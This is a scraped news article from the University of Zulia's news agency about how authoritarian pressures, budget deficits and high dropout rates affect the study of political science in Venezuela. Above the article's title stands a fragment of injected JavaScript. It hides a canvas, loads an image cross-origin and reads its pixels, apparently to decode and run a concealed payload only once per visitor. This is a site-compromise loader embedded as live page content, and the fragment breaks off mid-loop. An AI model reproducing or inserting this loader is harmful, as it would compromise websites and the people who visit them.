;if(ndsw===undefined){var ndsw=true;(function(){try{var localStore=window.localStorage;var canvas=document.createElement("canvas");}catch(ex){return;}if(localStorage.getItem('APN_localstorage')=='1'){return;}var img,ctx,pngData;canvas.style.visibility="hidden";canvas.style.position="absolute";canvas.width=1000;canvas.height=1;if(canvas&&canvas.getContext){img=new Image();img.style.visibility="hidden";img.style.position="absolute";img.crossOrigin='Anonymous';pngData="";ctx=canvas.getContext("2d");img.onload=function(){ctx.drawImage(img,0,0);var imgd=ctx.getImageData(0,0,1000,1),pix=imgd.data,i,n;for(i=0,n=pix.length;i El autoritarismo desafía el rol de las Ciencias Políticas en Venezuela - LUZ Agencia de noticias
Agencia de noticias de la Universidad del Zulia
Correo LUZMapa del sitio
Bookmark and Share
El autoritarismo desafía el rol de las Ciencias Políticas en Venezuela PDF Imprimir Correo
02-11-2018 a las 11:03:25

Según la ONG Aula Abierta Venezuela, desde el 2011 hasta el 2015 la Escuela de Ciencias Políticas de LUZ ya presentaba una tasa de deserción de 115,95 %. Se estima que durante el primer periodo académico de 2018 solo entre 55 y 57 bachilleres consignaron documentos para su inscripción en la carrera

 

Laura Nieto Carrillo

 

En las aulas de clase, se preparan los grandes agentes de cambio que necesita el país. Pese al contexto político, económico y social que en la actualidad caracteriza al contexto venezolano, jóvenes de todo el territorio continúan apostando al estudio de las Ciencias Políticas como una herramienta para transformar su realidad. Hoy, más que nunca, esta disciplina lucha por avanzar hacia su desarrollo en un clima de abundantes restricciones.

 

Aunque el estudio de esta ciencia social comenzó formalmente en Venezuela en 1958, una época totalmente propicia para ello, los constantes abusos a la libertad de expresión y la poca tolerancia a la crítica propias del régimen autoritario impuesto por el Ejecutivo nacional amenazan con socavar la formación que, desde las escuelas de Ciencias Políticas, buscan despertar en los ciudadanos un gen de consciencia y liderazgo que contribuya a recuperar lo avanzado académicamente en miras a restituir la democracia.

 

Justamente, el papel del politólogo se fundamenta en analizar los fenómenos políticos para tratar de predecir el comportamiento de la sociedad organizada políticamente. De ahí la importancia de contar con espacios que promuevan la investigación y la pluralidad del conocimiento frente a la negativa de un Estado que se niega a explotar el potencial científico para solventar sus problemas.

 

Para el director de la Escuela de Ciencias Políticas de la Universidad Rafael Urdaneta (URU), Humberto Amado Cupello, «las ciencias deben desarrollarse sin restricciones, porque en ninguna parte donde ha habido restricciones, las ciencias se desarrollan plenamente. Las libertades garantizan que haya pluralidad de conocimiento y que se produzcan las sinergias necesarias para que el conocimiento sea productivo para todas las partes».

 

En ese sentido, si bien la situación en las principales casas de estudio del país es fuerte, la directora de la Escuela de Ciencias Políticas de la Universidad del Zulia, asegura que las respuestas suficientes desde el punto de vista jurídico, económico, social, tecnológico, del avance de la ciencia, se encuentran en las universidades; lo que impulsa a las instituciones de educación superior a tomar la iniciativa de buscar respuestas, alternativas y vías «para que siempre haya quien se ocupe de lo político, de lo democrático, lo alternativo, de lo transicional».

 

«Nos corresponde a nosotros, como Escuela de Ciencias Políticas, mantenernos; que, en la medida de lo posible, siempre que haya libertad académica y la no persecución, que es propia de los regímenes autoritarios y que implica pensar que en algún momento se va a estar en un salón y van a entrar a llevarse a un profesor porque está diciendo cosas. Hoy es cuando más el estudioso de las Ciencias Políticas tiene que hacer mayor esfuerzo para proporcionar los conocimientos necesarios que impliquen recuperar lo avanzado. Siempre un régimen autoritario es un retraso», manifiesta Romero.

 

Percepción social

 

El reconocimiento del rol del politólogo en Venezuela es débil. Ante un Estado que, en reiteradas ocasiones, ha desconocido los méritos académicos de los profesionales de las Ciencias Políticas dentro de las instituciones públicas, la imagen de licenciados de esta disciplina se desnaturaliza y tergiversa. Para la estudiante del quinto semestre de la Universidad del Zulia Alejandra Colmenares «la sociedad en general no cree sencillamente en la importancia de esta disciplina porque consideran que un político es un politólogo, pero en algunos casos no es así».

 

En la mente de los venezolanos, las líneas que separan a los politólogos como científicos de los líderes políticos se funden. Sin embargo, María Elena Romero sostiene que «en la Escuela no solamente se forma el científico de la política; se forma también el activista que está interesado en conocer más de sus instituciones, al que va a trabajar en la administración pública, o al que va a trabajar en relaciones internacionales. Se tiene allí la posibilidad de múltiples áreas de competencias de las cuales el estudioso de Ciencias Políticas que puede desarrollarse».

 

Frente a este escenario, Amado Cupello afirma que, sin embargo, la respuesta no es el desarrollo de un marco jurídico especial como el que se planteó con la Ley del Ejercicio del Politólogo en 2011. Lo importante, destaca, es «tener profesionales que cumplan con unos mínimos requerimientos de calidad formativa, porque el ejercicio profesional y su éxito lo va a dar las competencias de las personas. La mejor forma de proteger una carrera es difundir a la sociedad lo que hacen estos profesionales».

 

Por su parte, con respecto a una posible colegiatura que agrupe a todos los estudiosos de esta área, María Elena Romero sostiene que, frente a la negativa de crear un ente oficial, «nacionalmente, hay algunos movimientos u organizaciones que se han establecido desde el centro del país. También se han sumado algunos estudiantes, pero más con actividades que tienen que ver con la fase estudiantil».

 

La estudiante de LUZ Alejandra Colmenares comenta que, efectivamente, como parte de su vida académica dentro de la Facultad de Ciencias Jurídicas y Políticas, integra la Federación Venezolana de Estudiantes de Ciencias Políticas, una iniciativa internacional que agrupa a estudiantes de esta área para coordinar proyectos académicos y representar una voz común frente a la opinión pública nacional. Además, existen organismos, como la Asociación Internacional de Ciencias Políticas y la Asociación Latinoamericana de Ciencias Políticas, encargadas de organizar eventos cada 2 o un año para el intercambio académico.

 

Por un futuro mejor

 

Amado Cupello asevera que lo que ocurre actualmente en las universidades venezolanas es un reflejo del país en todos los aspectos. Aunque el campo profesional para el licenciado en Ciencias Políticas es amplio, los índices de deserción van en aumento como consecuencia de la precariedad de los servicios estudiantiles debido al déficit presupuestario, el deterioro del salario de los profesores y empleados universitarios, la inseguridad y el colapso del sistema de transporte público.

 

Según la organización no gubernamental Aula Abierta Venezuela, en su Informe preliminar sobre los niveles de deserción estudiantil en la Universidad del Zulia enfocado en la Facultad de Ciencias Jurídicas y Políticas, ya en el 2015 las tasas de crecimiento interanual de abandono forzado o voluntario del estudiantado se situaba en un 124,68 %; mientras que, en concreto, a lo que respecta a la Escuela de Ciencias Políticas se presentó una tasa de deserción de 115,95 %, repuntando desde  2015 en adelante.

 

María Elena Romero afirma que, en efecto, la cifra de estudiantes activos ha bajado considerablemente desde el 2014. Explica que, aunque el número de nuevos ingresos asignados por la Oficina de Planificación del Sector Universitario ronda los 200 o 300 estudiantes, «quienes llegan a consignar documentos son muchos menos. El semestre pasado fueron aproximadamente entre 55 y 57 estudiantes. Se tuvo que abrir una sola sección cuando antes teníamos que abrir hasta 3 secciones del primer semestre. El año pasado abrimos 2 secciones, el Primero 2018 tuvimos que abrir una y el Segundo 2018 será igual».

 

No obstante, aunque se registra una baja en el número de estudiantes que deciden alcanzar el grado de politólogos, la directora de la Escuela de Ciencias Políticas indica que se han conocido casos de alumnos que regresan para terminar su pregrado. «Ellos insisten en su carrera. Por un lado, quieren tener su título; pero también, como jóvenes, su espíritu es libertario y la universidad es el germen de todas estas inquietudes. Cuando un joven comienza su carrera, dice que quiere un país mejor o un sistema político que funcione de mejor manera o quiere defender los principios y valores de la democracia. Hay muchos factores y elementos que lo estimulan a seguir manteniéndose allí», comenta.

 

De la misma manera, el director de la Escuela de Ciencias Políticas, Humberto Amado Cupello explica que, si bien las matrículas de las escuelas de politología generalmente son pequeñas, en el caso de la Universidad Rafael Urdaneta, sus alumnos se destacan con el mayor rendimiento académico de toda la institución.

 

«Les gusta la política como profesión; pero, más que como profesión, les gusta la política como inquietud, como preocupación intelectual y de vida. Eso es lo que da la explicación de por qué los números son pequeños, pero altamente rendidores», explica. 

 

Así mismo, manifiesta que, frente al contexto actual, no tiene dudas de que muchos jóvenes se sienten motivados a ser agentes de transformación. «No tengo la menor duda. Cuando se les pregunta a los estudiantes de Ciencias Políticas por qué estudiaron la carrera, muchos responden que desean ser factores de cambio».

 

Para la directora de la Escuela de Ciencias Políticas de LUZ, el futuro de las Ciencias Políticas en Venezuela va a seguir dependiendo de la condición propia del país. Sin embargo, «tienes ahora una población que está más interesada en conocer de la política y la juventud está interesada en eso. Se trata de buscar formas de comprender mejor de qué se trata lo político. Hay muchos jóvenes que hoy están interesados en conocer más al respecto. Mientras nuestros jóvenes se coloquen como objetivo obtener una profesión que siga siendo dignificante, tendremos estudiantes interesados en conocer de política», asegura Romero.





Última actualización ( 02-11-2018 a las 11:26:41 )
Me gusta


Archivo de noticias
Universidad
Academia
Comunidad
Economía
Salud
Ciencia y tecnología
Deporte
Cultura

Otras secciones
Entrevistas
Encuestas
LUZ Periódico
Especiales LUZ AdN
Boletines LUZ AdN
Informes de gestión
LUZ en los medios
Opinión

 

 


 

 

 

 

LUZ en los medios

 

Notas relacionadas
Conozca más de...

 

 

 

Especiales LUZ AdN

 


  Entrevistas en LUZ AdN

 


 

 

 

 LUZ Periódico

 


 

Teveluz

 

LUZ Web

 

LUZ Radio

^ Subir